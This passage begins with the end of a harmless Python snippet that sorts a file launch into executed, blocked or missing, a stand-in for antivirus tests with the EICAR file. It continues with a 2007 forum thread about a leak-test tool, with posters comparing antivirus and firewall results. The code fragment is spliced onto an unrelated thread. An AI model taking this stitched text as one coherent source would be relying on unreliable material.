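    quarantined the file surfaces as FileNotFoundError."""
    try:
        subprocess.run([path], check=False, timeout=5,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    except PermissionError:
        return ACCESS_DENIED
    except FileNotFoundError:
        return MISSING
    return EXECUTED


def demo():
    """Constructed sample: three harmless files standing in for the test
    payload (e.g. the EICAR file) in three states an AV can leave it in.
    The missing execute bit is a stand-in for an AV's Access Denied."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        allowed = os.path.join(d, "allowed.sh")
        with open(allowed, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
        os.chmod(allowed, 0o755)
        results["allowed"] = classify_launch(allowed)

        blocked = os.path.join(d, "blocked.sh")
        with open(blocked, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
        os.chmod(blocked, 0o644)
        results["blocked"] = classify_launch(blocked)

        # File never written, as if quarantined before launch.
        results["quarantined"] = classify_launch(os.path.join(d, "gone.sh"))
    return results
```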
Cerxes
November 23rd, 2007, 09:06 PM
@vlk: Running in a LUA, I did a new test with Avast (latest version), and followed your instructions accordingly regarding Avast's settings. But it still writes eicar.com to the hard drive and I can also execute the file; it will not be blocked. Am I missing something here, since it doesn't correlate with your prediction/test?
/C.
Rasheed187
November 25th, 2007, 01:37 PM
Haven't done any testing myself yet, but just wanted to congratulate dmenace on this nice new testing tool, sure looks interesting. ;)
aigle
December 3rd, 2007, 11:25 AM
Has anyone notified the TF forums and CFP forums about it (I think both failed this test)?
Thanks
aigle
December 5th, 2007, 03:04 AM
-{ Quote: "Has anyone notified the TF forums and CFP forums about it (I think both failed this test)?
Thanks" }-
Anyone please!
Eh_Greg
December 5th, 2007, 04:55 AM
Last time I checked, the "firewall" part of the test passed with flying colors. Maybe there was an issue with the registry part. I don't consider the eicar file a valid test just for CFP alone. Perhaps Dmenace or Endangered Frog knows the answers if there has been a new version of the test released. 8)
Adric
December 5th, 2007, 10:41 AM
-{ Quote: "Has anyone tried Comodo v3 against it?
Thanks" }-
I've tested it. My AV caught the EICAR; HIPS and FW caught by V3 (288).
Previous CFP V3 had a missing protected reg key default that caused it not to pass the test.
Under Automatic Startup Group
*\Software\Microsoft\Windows\CurrentVersion\Run*
If it is not there, then add it.
Al
dmenace
December 7th, 2007, 05:39 AM
Yahoo has sadly shutdown Zeroday Software's website because apparently any linking to external websites is banned.
As a result if anyone still wants to download System Shutdown Simulator please get it here:
http://www.firewallleaktester.com/mirror/zeroday_software/sss.htm
I've paused development on SSS as I am busy at the moment. May later implement TCP instead of ping. But it's pretty much complete and bug free now anyway.
The latest release is 1.0.21. The website issue will be fixed at a later date.
gkweb
December 7th, 2007, 01:33 PM
Hello,
Sorry to hear your problems :-\
Previously I was pointing to your website for download. However because of the context and per your asking, I am hosting the binary as well, which is available from now.
Regards,
gkweb.
EASTER
December 8th, 2007, 06:13 AM
Noble and sharp effort on your part dmenace and a great catch, also thanks are due to gkweb for hosting it.
I'm sure as time passes other keylog vulnerabilities are bound to surface again, but it's nice to know there's always a global pool of attentive minds that are around-the-clock scrutinizing every piece of a potential exploit.
fax
December 8th, 2007, 03:36 PM
Hi!
Tested with ZA Security Suite 7.0462.000 and all tests passed ;)
Cheers,
Fax
dmenace
December 10th, 2007, 03:28 AM
I have moved ZeroDay Software to another web hosting company; "Free Web Hosting Area" and to a new web address at http://zeroday-software.freetzi.com/. I apologise for any inconvenience caused.
Due to this change there will be several broken links.
A new version of System Shutdown Simulator (1.0.22) has also been released with the updated web address.
Let's hope that this web host will last longer than the previous one!
Hopefully gkweb can continue to mirror SSS (even the old 1.0.21) as I lack confidence in this free web host. If you have trouble viewing the page / downloading SSS, ensure you allow the referrer and turn ad blocking off.
Many thanks,
dmenace.
SystemJunkie
December 25th, 2007, 03:22 AM
I usually delete this Visual Basic file, so in my case this is no threat. ;D ;D ;D ;D ;D ;D ;D Dependency malware is weak.